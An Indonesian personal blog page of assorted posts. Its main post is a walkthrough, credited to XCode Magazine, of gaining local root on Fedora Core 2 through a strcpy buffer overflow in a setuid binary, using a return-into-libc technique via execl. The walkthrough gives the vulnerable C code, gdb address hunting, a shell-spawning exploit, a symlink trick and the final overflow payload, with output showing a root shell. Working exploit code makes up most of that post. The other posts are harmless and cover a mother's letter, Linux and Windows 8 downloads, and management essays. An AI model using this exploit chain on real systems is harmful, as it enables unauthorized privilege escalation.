2011 ~ Ihzan Blog

Jumat, 04 November 2011

Tekhnik Hacking Local Root on Fedore Core 2

01.26 by UnknownNo comments

greatz to #bruteforce team... @dalnet and

#indohacking, #mvp, #antihackerlink, #yogyafree, #binushacker and #jam5

crew

lets rock in roll

Mari membuat program bahasa c yang simpel untuk test vulnerability

[ihzan@localhost fedora]$ cat vul.c

int main(int argc, char *argv[])

{

char buffer[256];

strcpy(buffer,argv[1]);

return 0;

}

sekarang mari kita kompilasi

[ihzan@localhost fedora]$ gcc -o vul vul.c

dan sekarang mari kita buat sesuatu untuk sebuah test yang sempurna

[ihzan@localhost fedora]$ su

Password:

[root@localhost fedora]# chgrp root vul

[root@localhost fedora]# chown root vul

[root@localhost fedora]# chmod 4755 vul

[root@localhost fedora]# ls -l vul

-rwsr-xr-x 1 root root 4733 11?12 23:11 vul

[root@localhost fedora]# su ihzan

[ihzan@localhost fedora]$

nah sekarang kamu siap menyerang program vulnerability....

dan langkah pertama yang harus kamu jalanin adalah mencari alamat dari

<execl+3> dengan menggunakan GDB

gdb apaan yah ?? pasti teman2 bingung.. nah saya juga lagi bingung.... hehehe
use ur imagination

[ihzan@localhost fedora]$ gdb vul

GNU gdb Red Hat Linux (6.0post-0.20040223.19rh)

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux-gnu"...(no debugging symbols found)...Using

host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) b main

Breakpoint 1 at 0x8048379

(gdb) r

Starting program: /home/ihzan/fedora/vul

Error while mapping shared library sections:

: ?

깃났.

Error while reading shared library symbols:

: 洹몃?漿佾 應좏좊━媛 壹.

(no debugging symbols found)...(no debugging symbols found)...Error while reading shared

library symbols:

: 洹몃?漿佾 應좏좊━媛 壹.

Error while reading shared library symbols:

: 洹몃?漿佾 應좏좊━媛 壹.

Breakpoint 1, 0x08048379 in main ()

(gdb) disas execl

Dump of assembler code for function execl:

0x005fea00 <execl+0>: push %ebp

0x005fea01 <execl+1>: mov %esp,%ebp

0x005fea03 <execl+3>: lea 0x10(%ebp),%eax

0x005fea06 <execl+6>: push %edi

0x005fea07 <execl+7>: push %esi

0x005fea08 <execl+8>: push %ebx

0x005fea09 <execl+9>: sub $0x1030,%esp

0x005fea0f <execl+15>: mov 0xc(%ebp),%ecx

0x005fea12 <execl+18>: movl $0x400,0xfffffff0(%ebp)

0x005fea19 <execl+25>: lea 0x1b(%esp),%esi

0x005fea1d <execl+29>: and $0xfffffff0,%esi

0x005fea20 <execl+32>: call 0x58c90d <__i686.get_pc_thunk.bx>

0x005fea25 <execl+37>: add $0x905d7,%ebx

0x005fea2b <execl+43>: mov %ecx,(%esi)

0x005fea2d <execl+45>: test %ecx,%ecx

0x005fea2f <execl+47>: mov %eax,0xffffffe8(%ebp)

0x005fea32 <execl+50>: movl $0x1,0xffffffec(%ebp)

0x005fea39 <execl+57>: je 0x5fea73 <execl+115>

0x005fea3b <execl+59>: movl $0x1a,0xffffffe0(%ebp)

0x005fea42 <execl+66>: lea 0x0(%esi),%esi

0x005fea49 <execl+73>: lea 0x0(%edi),%edi

0x005fea50 <execl+80>: mov 0xfffffff0(%ebp),%edx

0x005fea53 <execl+83>: cmp %edx,0xffffffec(%ebp)

0x005fea56 <execl+86>: je 0x5fea96 <execl+150>

0x005fea58 <execl+88>: addl $0x8,0xffffffe0(%ebp)

0x005fea5c <execl+92>: mov 0xffffffe8(%ebp),%edx

0x005fea5f <execl+95>: mov 0xffffffec(%ebp),%edi

0x005fea62 <execl+98>: addl $0x4,0xffffffe8(%ebp)

0x005fea66 <execl+102>: mov (%edx),%ecx

0x005fea68 <execl+104>: mov %ecx,(%esi,%edi,4)

0x005fea6b <execl+107>: inc %edi

0x005fea6c <execl+108>: test %ecx,%ecx

0x005fea6e <execl+110>: mov %edi,0xffffffec(%ebp)

0x005fea71 <execl+113>: jne 0x5fea50 <execl+80>

0x005fea73 <execl+115>: mov 0xfffffee0(%ebx),%edi

0x005fea79 <execl+121>: mov (%edi),%ecx

0x005fea7b <execl+123>: mov %esi,0x4(%esp)

0x005fea7f <execl+127>: mov 0x8(%ebp),%esi

0x005fea82 <execl+130>: mov %ecx,0x8(%esp)

0x005fea86 <execl+134>: mov %esi,(%esp)

0x005fea89 <execl+137>: call 0x5fe7a0 <execve>

0x005fea8e <execl+142>: lea 0xfffffff4(%ebp),%esp

0x005fea91 <execl+145>: pop %ebx

0x005fea92 <execl+146>: pop %esi

0x005fea93 <execl+147>: pop %edi

0x005fea94 <execl+148>: pop %ebp

0x005fea95 <execl+149>: ret

0x005fea96 <execl+150>: mov 0xffffffec(%ebp),%edx

0x005fea99 <execl+153>: mov 0xffffffe0(%ebp),%ecx

0x005fea9c <execl+156>: add %edx,%edx

0x005fea9e <execl+158>: mov %edx,0xffffffe4(%ebp)

0x005feaa1 <execl+161>: and $0xfffffffc,%ecx

0x005feaa4 <execl+164>: sub %ecx,%esp

0x005feaa6 <execl+166>: mov %edx,0xfffffff0(%ebp)

0x005feaa9 <execl+169>: mov 0xffffffe4(%ebp),%eax

0x005feaac <execl+172>: lea 0x1b(%esp),%edx

0x005feab0 <execl+176>: and $0xfffffff0,%edx

0x005feab3 <execl+179>: lea (%eax,%edx,1),%edi

0x005feab6 <execl+182>: cmp %esi,%edi

0x005feab8 <execl+184>: je 0x5feacc <execl+204>

0x005feaba <execl+186>: cld

0x005feabb <execl+187>: mov 0xffffffec(%ebp),%ecx

0x005feabe <execl+190>: mov %edx,%edi

0x005feac0 <execl+192>: shl $0x2,%ecx

0x005feac3 <execl+195>: shr $0x2,%ecx

0x005feac6 <execl+198>: repz movsl %ds:(%esi),%es:(%edi)

0x005feac8 <execl+200>: mov %edx,%esi

0x005feaca <execl+202>: jmp 0x5fea58 <execl+88>

0x005feacc <execl+204>: cld

0x005feacd <execl+205>: mov 0xffffffec(%ebp),%ecx

0x005fead0 <execl+208>: mov %edx,%edi

0x005fead2 <execl+210>: shl $0x2,%ecx

0x005fead5 <execl+213>: shr $0x2,%ecx

0x005fead8 <execl+216>: repz movsl %ds:(%esi),%es:(%edi)

0x005feada <execl+218>: mov %edx,%esi

0x005feadc <execl+220>: mov 0xffffffe4(%ebp),%edi

0x005feadf <execl+223>: mov 0xffffffec(%ebp),%eax

0x005feae2 <execl+226>: add %eax,%edi

0x005feae4 <execl+228>: mov %edi,0xfffffff0(%ebp)

0x005feae7 <execl+231>: jmp 0x5fea58 <execl+88>

0x005feaec <execl+236>: nop

0x005feaed <execl+237>: nop

0x005feaee <execl+238>: nop

0x005feaef <execl+239>: nop

End of assembler dump.

(gdb) q

The program is running. Exit anyway? (y or n) y

Pusing khan ?? sama saya juga pusink liatnya....

Tetep semangat aja ya ....

[ihzan@localhost fedora]$

alasan nya kita tidak punya alamat dari <execl+0> atau <execl+1> karna

nilai dari %ebp mungkin berubah bila "push %ebp" atau "mov %esp,%ebp"

di eksekusi. kita temukan alamat dari <execl+3> sangat gampang dengan

mengunakan gdb: 0x005fea03.

nah dari mana dapat nya tuh... jawaban nya tetep sama .... use your imajination.

loh kok gitu jawaban nya.... pasti kamu berkata gitu... karna kalo di jelaskan

panjang banget

bro....

hikz

mari kita lanjutkan lagi

hajar.....

[ihzan@localhost fedora]$ gdb -q vul

(no debugging symbols found)...Using host libthread_db library

"/lib/tls/libthread_db.so.1".

(gdb) b main

Breakpoint 1 at 0x8048379

(gdb) r

Starting program: /home/ihzan/fedora/vul

Error while mapping shared library sections:

: ?

깃났.

Error while reading shared library symbols:

: 洹몃?漿佾 應좏좊━媛 壹.

(no debugging symbols found)...(no debugging symbols found)...Error while reading shared

library symbols:

: 洹몃?漿佾 應좏좊━媛 壹.

Error while reading shared library symbols:

: 洹몃?漿佾 應좏좊━媛 壹.

Breakpoint 1, 0x08048379 in main ()

(gdb) x/50x 0x8049000

0x8049000: 0x464c457f 0x00010101 0x00000000 0x00000000

0x8049010: 0x00030002 0x00000001 0x080482c0 0x00000034

0x8049020: 0x00000788 0x00000000 0x00200034 0x00280007

0x8049030: 0x0019001c 0x00000006 0x00000034 0x08048034

0x8049040: 0x08048034 0x000000e0 0x000000e0 0x00000005

0x8049050: 0x00000004 0x00000003 0x00000114 0x08048114

0x8049060: 0x08048114 0x00000013 0x00000013 0x00000004

0x8049070: 0x00000001 0x00000001 0x00000000 0x08048000

0x8049080: 0x08048000 0x0000047c 0x0000047c 0x00000005

0x8049090: 0x00001000 0x00000001 0x0000047c 0x0804947c

0x80490a0: 0x0804947c 0x00000100 0x00000104 0x00000006

0x80490b0: 0x00001000 0x00000002 0x00000490 0x08049490

0x80490c0: 0x08049490 0x000000c8

(gdb)

0x80490c8: 0x000000c8 0x00000006 0x00000004 0x00000004

0x80490d8: 0x00000128 0x08048128 0x08048128 0x00000020

0x80490e8: 0x00000020 0x00000004 0x00000004 0x6474e551

0x80490f8: 0x00000000 0x00000000 0x00000000 0x00000000

0x8049108: 0x00000000 0x00000006 0x00000004 0x62696c2f

0x8049118: 0x2d646c2f 0x756e696c 0x6f732e78 0x0000322e

0x8049128: 0x00000004 0x00000010 0x00000001 0x00554e47

0x8049138: 0x00000000 0x00000002 0x00000002 0x00000005

0x8049148: 0x00000003 0x00000006 0x00000004 0x00000001

0x8049158: 0x00000005 0x00000000 0x00000000 0x00000000

0x8049168: 0x00000000 0x00000003 0x00000002 0x00000000

0x8049178: 0x00000000 0x00000000 0x00000000 0x00000044

0x8049188: 0x00000000 0x000000ef

(gdb)

0x8049190: 0x00000012 0x00000035 0x08048474 0x00000004

0x80491a0: 0x000e0011 0x00000001 0x00000000 0x00000000

0x80491b0: 0x00000020 0x00000015 0x00000000 0x00000000

0x80491c0: 0x00000020 0x0000002e 0x00000000 0x00000030

0x80491d0: 0x00000012 0x764a5f00 0x6765525f 0x65747369

0x80491e0: 0x616c4372 0x73657373 0x675f5f00 0x5f6e6f6d

0x80491f0: 0x72617473 0x005f5f74 0x6362696c 0x2e6f732e

0x8049200: 0x74730036 0x79706372 0x4f495f00 0x6474735f

0x8049210: 0x755f6e69 0x00646573 0x696c5f5f 0x735f6362

0x8049220: 0x74726174 0x69616d5f 0x4c47006e 0x5f434249

0x8049230: 0x00302e32 0x00020000 0x00000001 0x00020000

0x8049240: 0x00010001 0x00000024 0x00000010 0x00000000

0x8049250: 0x0d696910 0x00020000

(gdb)

0x8049258: 0x00000056 0x00000000 0x08049558 0x00000406

0x8049268: 0x08049568 0x00000107 0x0804956c 0x00000507

0x8049278: 0x83e58955 0x61e808ec 0xe8000000 0x000000bc

0x8049288: 0x0001a3e8 0x00c3c900 0x956035ff 0x25ff0804

0x8049298: 0x08049564 0x00000000 0x956825ff 0x00680804

0x80492a8: 0xe9000000 0xffffffe0 0x956c25ff 0x08680804

0x80492b8: 0xe9000000 0xffffffd0 0x895eed31 0xf0e483e1

0x80492c8: 0x68525450 0x080483ec 0x0483a468 0x68565108

0x80492d8: 0x08048370 0xffffbfe8 0x9090f4ff 0x53e58955

0x80492e8: 0x000000e8 0xc3815b00 0x0000126f 0xfc838b50

0x80492f8: 0x85ffffff 0xff0274c0 0xfc5d8bd0 0x9090c3c9

0x8049308: 0x83e58955 0x3d8008ec 0x0804957c 0xa1297500

0x8049318: 0x08049578 0xd285108b

(gdb)

0x8049320: 0xf6891774 0xa304c083 0x08049578 0x78a1d2ff

0x8049330: 0x8b080495 0x75d28510 0x7c05c6eb 0x01080495

0x8049340: 0xf689c3c9 0x83e58955 0x8ca108ec 0x85080494

0x8049350: 0xb81974c0 0x00000000 0x1074c085 0x680cec83

0x8049360: 0x0804948c 0xc483d0ff 0x00768d10 0x9090c3c9

0x8049370: 0x81e58955 0x000108ec 0xf0e48300 0x000000b8

0x8049380: 0x83c42900 0x458b08ec 0x04c0830c 0x858d30ff

0x8049390: 0xfffffef8 0xff16e850 0xc483ffff 0x0000b810

0x80493a0: 0xc3c90000 0x57e58955 0xec835356 0x0000e80c

0x80493b0: 0x815b0000 0x0011aac3 0xfebae800 0x938dffff

0x80493c0: 0xffffff20 0xff208b8d 0xca29ffff 0xfac1f631

0x80493d0: 0x73d63902 0x90d7890f 0x20b394ff 0x46ffffff

0x80493e0: 0xf472fe39 0x5b0cc483

(gdb)

0x80493e8: 0xc3c95f5e 0x56e58955 0x0000e853 0x815b0000

0x80493f8: 0x001166c3 0x208b8d00 0x8dffffff 0xffff2083

0x8049408: 0xc1c129ff 0xc98502f9 0x75ff718d 0x003ae80b

0x8049418: 0x5e5b0000 0xf689c3c9 0x20b394ff 0x89ffffff

0x8049428: 0xd2854ef2 0xe5ebf275 0x53e58955 0x947ca152

0x8049438: 0xf8830804 0x947cbbff 0x0c740804 0xff04eb83

0x8049448: 0x83038bd0 0xf475fff8 0xc3c95b58 0x53e58955

0x8049458: 0x000000e8 0xc3815b00 0x000010ff 0xfe9ee852

0x8049468: 0x5d8bffff 0x00c3c9fc 0x00000003 0x00020001

0x8049478: 0x00000000 0xffffffff 0x00000000 0xffffffff

0x8049488 <__DTOR_END__>: 0x00000000 0x00000000 0x00000001

0x00000024

0x8049498 <_DYNAMIC+8>: 0x0000000c 0x08048278 0x0000000d 0x08048454

0x80494a8 <_DYNAMIC+24>: 0x00000004 0x08048148

(gdb)

0x80494b0 <_DYNAMIC+32>: 0x00000005 0x080481d4 0x00000006

0x08048174

0x80494c0 <_DYNAMIC+48>: 0x0000000a 0x00000060 0x0000000b

0x00000010

0x80494d0 <_DYNAMIC+64>: 0x00000015 0x005714b8 0x00000003

0x0804955c

0x80494e0 <_DYNAMIC+80>: 0x00000002 0x00000010 0x00000014

0x00000011

0x80494f0 <_DYNAMIC+96>: 0x00000017 0x08048268 0x00000011

0x08048260

0x8049500 <_DYNAMIC+112>: 0x00000012 0x00000008 0x00000013

0x00000008

0x8049510 <_DYNAMIC+128>: 0x6ffffffe 0x08048240 0x6fffffff

0x00000001

0x8049520 <_DYNAMIC+144>: 0x6ffffff0 0x08048234 0x00000000

0x00000000

0x8049530 <_DYNAMIC+160>: 0x00000000 0x00000000 0x00000000

0x00000000

0x8049540 <_DYNAMIC+176>: 0x00000000 0x00000000 0x00000000

0x00000000

0x8049550 <_DYNAMIC+192>: 0x00000000 0x00000000 0x00000000

0x08049490

0x8049560 <_GLOBAL_OFFSET_TABLE_+4>: 0x005714d0 0x00566830 0x0058c9f0

0x080482b6

0x8049570 <data_start>: 0x00000000 0x00000000

(gdb) x/8x 0x8049564

0x8049564 <_GLOBAL_OFFSET_TABLE_+8>: 0x00566830 0x0058c9f0 0x080482b6

0x8049574 <__dso_handle>: 0x00000000 0x08049488 0x00000000

0x00000000

(gdb)

nah loh

apaan lagi tuh... puyeng kan loe... sama gue juga puyeng.. apaan nih ya??

tapi jangan khawatir karna kita temukan bagian yang bisa di gunakan dari

execl(). penjelasan nya seperti ini :

execl(char *path, char *arg0,...,char *argn, 0);

seperti yang kamu liat, akhir dari argumen dari execl() pasti null ( alias kosong )

jadi kamu bisa menggunakan argumen dari execl() itu. ini penjeleasan yang lebih

detail

0x8049564 <_GLOBAL_OFFSET_TABLE_+8>: 0x00566830 0x0058c9f0 0x080482b6 0x00000000

---------- ---------- ----------

kita akan menggunakan execl() seperti "execl(0x8049568, 0x804956c,

0x8049570)". Kita harus menggunakan nilai dari alamat karna argumennya

pasti sebuah pointer.

ini penjelasan lebih detail

(gdb) x/8x 0x0058c9f0

0x58c9f0 <__libc_start_main>: 0x57e58955 0xec835356 0x0c458b4c 0xe810558b

---------- ---------- ---------- ---------

0x58ca00 <__libc_start_main+16>: 0xffffff09 0x25f8c381 0x7d8b0010 0x1c758b18

---------- ---------- --

(gdb) x/8x 0x080482b6

0x80482b6 <_init+62>: 0x00000868 0xffd0e900 0xed31ffff 0x83e1895e

0x80482c6 <_start+6>: 0x5450f0e4 0x83ec6852 0xa4680804 0x51080483

(gdb) q

The program is running. Exit anyway? (y or n) y

[ihzan@localhost fedora]$

25 bytes' data di 0x0058c9f0 adalah nama file ketika execl() di panggil. jadi kita

perlu membuat sebuah symbolic link dengan data ini. sekarang mari kita

membuat program exploit nya.

program ini harus bisa membuat hak akses kita menjadi (setuid(0)) dari program

vulnerability dan memberi akses root ketika kita sukses menyerang nya... woh...

mantap donk... hehehehehehe

[ihzan@localhost fedora]$ cat > exploit.c

#include <unistd.h>

main()

{

setreuid(geteuid(),geteuid());

setregid(getegid(),getegid());

execl("/bin/sh", "sh", 0);

}

[ihzan@localhost fedora]$ gcc -o exploit exploit.c

mari kita membuat symbolic link untuk exploit dengan nilai dari argument

pertama dari execl().

[ihzan@localhost fedora]$ ln -s /home/ihzan/fedora/exploit "`perl -e 'print

"\x55\x89\xe5\x57\x56\x53\x83\xec\x4c\x8b\x45\x0c\x8b\x55\x10",

"\xe8\x09\xff\xff\xff\x81\xc3\xf8\x25\x10"'`"

mari kita cek symboloic link nya apakah sukses.

[ihzan@localhost fedora]$ ls -l

刺怨

lrwxrwxrwx 1 ihzan ihzan 29 11?12 11:28 U??WVS??L?E??U?????????%? ->

/home/ihzan/fedora/exploit

-rwxrwxr-x 1 ihzan ihzan 5186 11?12 11:27 exploit

-rw-rw-r-- 1 ihzan ihzan 101 11?12 11:27 exploit.c

-rwsr-xr-x 1 root root 4725 11?12 10:31 vul

-rw-rw-r-- 1 ihzan ihzan 90 11?12 10:31 vul.c

[ihzan@localhost fedora]$

mantap... hehehheheheheheh

kalian bisa lihat kan apa yang terjadi dari proses yang terjadi

lanjut.............

pake gdb untuk cari nilai dari alamat nya

[ihzan@localhost fedora]$ gdb -q vul

(no debugging symbols found)...Using host libthread_db library

"/lib/tls/libthread_db.so.1".

(gdb) disas main

Dump of assembler code for function main:

0x08048370 <main+0>: push %ebp

0x08048371 <main+1>: mov %esp,%ebp

0x08048373 <main+3>: sub $0x108,%esp // 264 bytes are needed to overflow buffer

0x08048379 <main+9>: and $0xfffffff0,%esp

0x0804837c <main+12>: mov $0x0,%eax

0x08048381 <main+17>: sub %eax,%esp

0x08048383 <main+19>: sub $0x8,%esp

0x08048386 <main+22>: mov 0xc(%ebp),%eax

0x08048389 <main+25>: add $0x4,%eax

0x0804838c <main+28>: pushl (%eax)

0x0804838e <main+30>: lea 0xfffffef8(%ebp),%eax

0x08048394 <main+36>: push %eax

0x08048395 <main+37>: call 0x80482b0 <_init+56>

0x0804839a <main+42>: add $0x10,%esp

0x0804839d <main+45>: mov $0x0,%eax

0x080483a2 <main+50>: leave

0x080483a3 <main+51>: ret

End of assembler dump.

(gdb) q

[ihzan@localhost fedora]$

sekarang kita dapatkan seluruh data yang kita butuhkan untuk menyerang...

lihat di bawah ini data yang telah kita kumpulkan

+-------------------------+--------------------------------+---------------+

| data to overflow buffer | *first argument of execl() - 8 | *<execl + 3> |

+-------------------------+--------------------------------+---------------+

^ ^ ^

| | |

264 bytes 0x8049568 - 8 = 0x8049560 0x5fea03

nah gak terlalu puyeng seperti yang di atas kan ... hehehehhe

jadi data yang kita butuh kan untuk argumen awal dari execl() - 8 pada execl()

bekerja ketika kita memanggil execve() secara internal dan execve() referensi dari

ebp+8 ketika kita mengambil pointer dari nama file tersebut.

Mari kita lanjutkan serangan terakhir

[ihzan@localhost fedora]$ ./vul `perl -e 'print

"A"x264,"\x60\x95\x04\x08\x03\xea\x5f"'`

sh-2.05b# id

uid=0(root) gid=501(ihzan) groups=501(ihzan)

sh-2.05b# whoami

root

sh-2.05b#

wew root bo``` mantap

kita dapat root...

tau kan mo ngapain lagi...

hehehehhehe

=====================================================================

WARNING !!!

saya tidak bertanggung jawab atas penyalah gunaan dari artikel ini ini hanya

sebagai ilmu pengetahuan belaka

jadi sekali lagi ...

PLEASE DONT TRY THIS AT OTHER PEOPLE PCS

TRY THIS WITH YOUR OWN RISK

sumber : XCode Magazine

Curhatan Seorang Ibu

05.57 by UnknownNo comments

Ini surat dari ibu yang tersayat hatinya. Linangan air mata bertetesan deras menyertai tersusunnya tulisan ini.
Aku lihat engkau lelaki yang gagah lagi matang. Bacalah surat ini. Dan kau boleh merobek-robeknya setelah itu, seperti saat engkau meremukkan kalbuku sebelumnya.
Sejak dokter mengabari tentang kehamilan, aku berbahagia. Ibu-ibu sangat memahami makna ini dengan baik. Awal kegembiraan dan sekaligus perubahan psikis dan fisik. Sembilan bulan aku mengandungmu.
Seluruh aktivitas aku jalani dengan susah payah karena kandunganku. Meski begitu, tidak mengurangi kebahagiaanku. Kesengsaraan yang tiada hentinya, bahkan kematian kulihat didepan mataku saat aku melahirkanmu.
Jeritan tangismu meneteskan air mata kegembiraan kami. Berikutnya, aku layaknya pelayan yang tidak pernah istirahat. Kepenatanku demi kesehatanmu. Kegelisahanku demi kebaikanmu.
Harapanku hanya ingin melihat senyum sehatmu dan permintaanmu kepada Ibu untuk membuatkan sesuatu.
Masa remaja pun engkau masuki. Kejantananmu semakin terlihat, Aku pun berikhtiar untuk mencarikan gadis yang akan mendampingi hidupmu. Kemudian tibalah saat engkau menikah. Hatiku sedih atas kepergianmu, namun aku tetap bahagia lantaran engkau menempuh hidup baru.
Seiring perjalanan waktu, aku merasa engkau bukan anakku yang dulu. Hak diriku telah terlupakan. Sudah sekian lama aku tidak bersua, meski melalui telepon. Ibu tidak menuntut macam-macam. Sebulan sekali, jadikanlah ibumu ini sebagai persinggahan, meski hanya beberapa menit saja untuk melihat anakku.
Ibu sekarang sudah sangat lemah. Punggung sudah membungkuk, gemetar sering melecut tubuh dan berbagai penyakit tak bosan-bosan singgah kepadaku. Ibu semakin susah melakukan gerakan Anakku…..

Seandainya ada yang berbuat baik kepadamu, niscaya ibu akan berterima kasih kepadanya. Sementara Ibu telah sekian lama berbuat baik kepada dirimu. Manakah balasan dan terima kasihmu pada Ibu ? Apakah engkau sudah kehabisan rasa kasihmu pada Ibu ? Ibu bertanya-tanya, dosa apa yang menyebabkan dirimu enggan melihat dan mengunjungi Ibu ? Baiklah, anggap Ibu sebagai pembantu, mana upah Ibu selama ini ?
Anakku..
Ibu hanya ingin melihatmu saja. Lain tidak. Kapan hatimu memelas dan luluh untuk wanita tua yang sudah lemah ini dan dirundung kerinduan, sekaligus duka dan kesedihan ? Ibu tidak tega untuk mengadukan kondisi ini kepada Dzat yang di atas sana. Ibu juga tidak akan menularkan kepedihan ini kepada orang lain. Sebab, ini akan menyeretmu kepada kedurhakaan. Musibah dan hukuman pun akan menimpamu di dunia ini sebelum di akhirat. Ibu tidak akan sampai hati melakukannya,

Anakku…
Walaupun bagaimanapun engkau masih buah hatiku, bunga kehidupan dan cahaya diriku…
Anakku…
Perjalanan tahun akan menumbuhkan uban di kepalamu. Dan balasan berasal dari jenis amalan yang dikerjakan. Nantinya, engkau akan menulis surat kepada keturunanmu dengan linangan air mata seperti yang Ibu alami. Di sisi TUHAN, kelak akan berhimpun sekian banyak orang-orang yang menggugat.
Anakku..
Takutlah engkau kepada TUHAN karena kedurhakaanmu kepada Ibu. Sekalah air mataku, ringankanlah beban kesedihanku. Terserahlah kepadamu jika engkau ingin merobek-robek surat ini.

Anakku…
Ingatlah saat engkau berada di perut ibu. Ingat pula saat persalinan yang sangat menegangkan. Ibu merasa dalam kondisi hidup atau mati. Darah persalinan, itulah nyawa Ibu. Ingatlah saat engkau menyusui. Ingatlah belaian sayang dan kelelahan Ibu saat engkau sakit. Ingatlah ….. Ingatlah….
Ibu sangat merindukanmu…
Semoga jadi bahan renungan Kita untuk berbakti kepada orang tua...

Sumber : http://agoes-sitohang.blogspot.com

Linux Untuk Pemula

02.48 by UnknownNo comments

Zorin OS adalah distribusi Linux berbasis Ubuntu / Debian, ditujukan bagi pengguna yang baru mengenal Linux. Untuk tujuan ini menawarkan kemungkinan untuk mensimulasikan tampilan Windows XP atau Windows 7 dengan sentuhan mouse. Juga dapat dikonfigurasi sebagai desktop Gnome klasik karena didasarkan pada window manager

Qimo : Belajar Sistem Operasi Linux Untuk Anak Kecil

zorinos4

Ada beberapa versi, sebagian lainnya bebas dan ada yang berbayar walaupun harganya rendah. Mari kita mulai dengan yang pertama. Core OS Zorin, Tersedia dengan arsitektur 32 dan 64 bit. Zorin OS Lite, Sebuah versi lebih ringan dengan desktop x32 LXDE dan Educational OS Zorin dengan basis Core 32-bit. Untuk informasi lebih lengkap kunjungi situsnya di Zorin

Sumber : www.kasurkotor.com

Download Windows 8 Developer preview

02.23 by UnknownNo comments

Akhirnya Microsoft mengeluarkan versi Developer Preview untuk Windows 8 untuk pada developer. Meskipun windows 8 versi developer ini diperuntukkan bagi end user (pengguna yang megnenal windows lebih baik), kalian dapat men-download-nya secara gratis Windows 8 developer preview ISO image dan di install dual boot dengan Windows XP, Vista juga windows 7.

Download Windows 8 versi Developer Preview ISO image

System Requirements Spesifikasi hardware komputer untuk Windows 8 versi Developer Preview

Processor 1 GHz untuk 32-bit dan 64-bit
1 GB RAM (32-bit) dan 2 GB RAM untuk 64-bit
16 GB hard disk space (32-bit) dan 20 GB (64-bit)
DirectX 9 graphics dgn WDDM 1.0 atau yang lebih tinggi

Sebelum mengintstall Windows 8 Developer Preview

Kalian bisa melakukan install windows 8 versi ini di partisi hard disk baru atau dapat juga menggunakan upgrade dari Windows XP/Vista/7 ke Windows 8 menggunakan Developer preview build, saya sarankan untuk menggunakan celan install (install baru).

Windows 8 Developer Preview Build tersedia dalam format ISO images , kalian dapat download dan burn menggunakan Windows Disc Image Burner yang ada di Windows 7.

Cara Burn File Iso Image Di Windows 7 Tanpa Softaware Tambahan

Cara Uninstall Windows 8 Developer Preview

Kalian tidak dapat meng-uninstall Windows 8 Developer preview seperti software di windows , kalian perlu menginstal ulang sistem operasi yang kalian inginkan, untuk menghapus windows 8 versi preview ini.

Link download untuk Windows 8 Developer Preview: 32-bit (2.8 GB) 64-bit (3.6 GB)

sumber : www.kasurkotor.com

Penyelesaian Kasus MU 1

22.42 by UnknownNo comments

Yang pertama yang mesti diperhatikan dalam perusahaan ini adalah konsep manajemen yang dipakai, masalah pertama yang mesti diselesaikan disini adalah berada pada pihak pemilik perusahaan dan pemegang saham yang terlibat dalam perusahaan itu harus ada satu kesepakatan apakah akan tetap memakai manajemen yang lama atau beralih kemanajemen yang modern. Dengan pertimbangan jika semisalnya manajemen lama akan ditinggalkan maka perushaan butuh waktu untuk menyesuaikan dengan konsep manajemen modern. Perlu juga ditegaskan kepada para karyawan bahwa dengan penerpaan manajemen yang modern, perusahaan akan lebih maju dan setiap pegawai berkesempatan untuk mendapat reward ataupun semacam pengangkatan jabatan sesuai dengan kemampuan dan keahliaanya. Dengan itu manajemen baru perusahaan akan bisa mengevaluasi dan memperkuat peraturan internal, termasuk prosedur operasional strandar (SOP) terkait investasi,

Penguatan pengawasan internal yang akan diterapkan adalah dalam hal pengambilan keputusan untuk setiap transaksi yang dilakukan oleh perusahaan, transaksi disini mencakup dalam berbagai hal. Contohnya keputusan perusahaan dalam pengangkatan pegawai baru dalam perusahaan ataupun pengangkatan posisi seseorang dalam perusahaan itu. Pengawasan internal disini akan menjadi fokus utama pada maanjemen baru.

Pada manajemen lama pengambilan keputusan dalam perusahaan susah diterpakan dalam perusahaan karena masih menganut sistem kekeluargaan, pada manajemen modern nantinya setiap kebijakan pada perushaan akan ada monitoring secara langsung dalam jangka waktu tertentu. Selain dalam hal pengawasan, kelemahan manajemen lama adalah pengaturan mengenai batasa wewenang pengambilan keputusan investasi yang dibuat berdasarkan limit investasinya.

Nah pada manajemen modern nantinya semua keputusan terkait investasi yang bersifat kolegial dimana semua direksi harus terlibat dan tidak terbatasa pada direktur saja. Ketetntuan ini akan berlaku bilamana perusahaan akan melakukan penjaminan, tetap harus ada arahan dari para pemegang saham agar penempatan investasi yang dilakukan diperushaan yang dikelola pak martono dan anaknya sebagai pewaris kontrolnya pada perusahaan akan lebih kuat.

Menurut pendapat saya keputusan akan berpindah dari manajemen lama ke moden dalam perusahaan pak martono dinilai sangat te[at berdasrkan rincian yang telah disampiakan sebelemunya. Dengan penerpan manajemen modern juga akan mendongkrak produtifitas perusahaan karena adanya dorongan atau motivasi tersendiri pada diri karyawan karena bisa saja suatu saat kedudukan atau jabatan dinaikkan karena perushaan sudah berorientasi pada kerja bukan pada kekeluargaan.

Makalah Kepemimpinan

06.19 by UnknownNo comments

BAB I

PENDAHULUAN

1.1 LATAR BELAKANG MASALAH

Manusia adalah makhluk social yang tidak dapat hidup sendiri. Dalam hidup, manusia selalau berinteraksi dengan sesame serta dengan lingkungan. Manusia hidup berkelompok baik dalam kelompok besar maupun dalam kelompok kecil. Hidup dalam kelompok tentulah tidak mudah. Untuk menciptakan kondisi kehidupan yang harmonis anggota kelompok haruslah saling menghormati & menghargai. Keteraturan hidup perlu selalu dijaga. Hidup yang teratur adalah impian setiap insan. Menciptakan & menjaga kehidupan yang harmonis adalah tugas manusia.

Manusia adalah makhluk Tuhan yang paling tinggi disbanding makhluk Tuhan lainnya. Manusia di anugerahi kemampuan untuk berpikir, kemampuan untuk memilah & memilih mana yang baik & mana yang buruk. Dengan kelebihan itulah manusia seharusnya mampu mengelola lingkungan dengan baik. Tidak hanya lingkungan yang perlu dikelola dengan baik, kehidupan social manusiapun perlu dikelola dengan baik. Untuk itulah dibutuhkan sumber daya manusia yang berkualitas. Sumber daya yang berjiwa pemimpin, paling tidak untuk memimpin dirinya sendiri.

Dengan berjiwa pemimpin manusia akan dapat mengelola diri, kelompok & lingkungan dengan baik. Khususnya dalam penanggulangan masalah yang relatif sulit. Disinilah dituntut kearifan seorang pemimpin dalam mengambil keputusan agar masalah dapat terselesaikan dengan baik.

I.2 RUMUSAN MASALAH

